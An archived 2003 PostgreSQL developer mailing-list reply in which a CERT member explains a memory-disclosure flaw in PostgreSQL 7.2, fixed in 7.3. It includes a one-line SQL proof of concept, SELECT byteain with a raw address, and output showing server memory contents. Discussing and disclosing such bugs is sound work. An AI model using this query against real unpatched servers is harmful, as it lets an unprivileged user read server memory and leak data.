Skip site navigation (1) Skip section navigation (2)

Re: why was libpq.so's version number bumped?

From: Florian Weimer <Weimer(at)CERT(dot)Uni-Stuttgart(dot)DE>
To: Bruce Momjian <pgman(at)candle(dot)pha(dot)pa(dot)us>
Cc: pgsql-hackers(at)postgresql(dot)org
Subject: Re: why was libpq.so's version number bumped?
Date: 2003-01-03 23:18:55
Message-ID: 87u1gprfds.fsf@Login.CERT.Uni-Stuttgart.DE (view raw or flat)
Thread:
Lists: pgsql-hackers 
Bruce Momjian <pgman(at)candle(dot)pha(dot)pa(dot)us> writes:

>> Hmm?  On 7.2, an unpriviliged database user can read the more or less
>> the whole memory image of the server process.  On 7.3, this has been
>> fixed.
>
> Huh.  Never heard that before.

It's the cash_out(2) crash, but with some other conversion function:

rusfw=> SELECT byteain(134512640);
       byteain       
---------------------
 \177ELF\001\001\001
(1 row)

rusfw=> 

(Of course, the address varies from machine to machine.)

-- 
Florian Weimer 	                  Weimer(at)CERT(dot)Uni-Stuttgart(dot)DE
University of Stuttgart           http://CERT.Uni-Stuttgart.DE/people/fw/
RUS-CERT                          fax +49-711-685-5898

In response to

pgsql-hackers by date

Next:From: Bruce MomjianDate: 2003-01-03 23:31:41
Subject: Re: Upgrading rant.
Previous:From: Bruce MomjianDate: 2003-01-03 23:15:28
Subject: Re: why was libpq.so's version number bumped?

Privacy Policy | About PostgreSQL
Copyright © 1996-2013 The PostgreSQL Global Development Group